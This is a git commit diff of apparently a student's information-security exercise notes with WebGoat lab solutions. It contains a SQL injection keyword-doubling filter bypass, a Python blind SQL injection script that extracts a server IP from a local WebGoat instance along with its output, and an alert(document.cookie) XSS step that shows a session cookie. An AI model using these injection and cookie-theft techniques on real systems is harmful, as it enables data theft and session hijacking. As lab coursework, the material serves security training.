vault backup: 2023-04-17 15:30:20

2023-04-17 15:30:20 +02:00
parent c7375ce49b
commit f81f042b9b
2 changed files with 123 additions and 79 deletions
--- a/Informationssicherheit/Ueb2/Ueb2.md
+++ b/Informationssicherheit/Ueb2/Ueb2.md
@@ -219,3 +219,59 @@ a';/**/select/**/*/**/from/**/user_system_data;--
 ```

 ### 4
+```
+a';/**/seselectlect/**/*/**/frfromom/**/user_system_data;--
+```
+
+### 5
+```python
+import json  
+import requests  
+  
+def sql_injection_mitigation_10():  
+	 index = 0  
+  
+	 headers = {  
+		 'Cookie': 'JSESSIONID=8f8OmDA8QEB8JwmEJtPbWkvVtAM_2AerEHJoWYFT'  
+	 }  
+  
+	 while True:  
+		 payload = '(CASE WHEN (SELECT ip FROM servers WHERE hostname=\'webgoat-prd\') LIKE \'{}.%\' THEN id ELSE hostname END)'.format(index)  
+  
+		 r = requests.get('http://127.0.0.1:8080/WebGoat/SqlInjectionMitigations/servers?column=' + payload, headers=headers)  
+  
+		 try:  
+			 response = json.loads(r.text)  
+		 except:  
+			 print("Wrong JSESSIONID, find it by looking at your requests once logged in.")  
+			 return  
+  
+		 if response[0]['id'] == '1':  
+			 print('webgoat-prd IP: {}.130.219.202'.format(index))  
+			 return  
+		 else:  
+			 index += 1  
+			 if index > 255:  
+				 print("No IP found")  
+				 return  
+  
+sql_injection_mitigation_10()
+```
+Output: 
+```
+webgoat-prd IP: 104.130.219.202
+```
+
+## Aufgaben
+### a
+
+
+# 2.3
+
+## Cross Site Scripting
+
+### 1
+alert(document.cookie)
+- JSESSIONID=WAoLCuHqYVKBPATEYnT23tGJaJPRHR9xRbDfnd2C
+
+### 2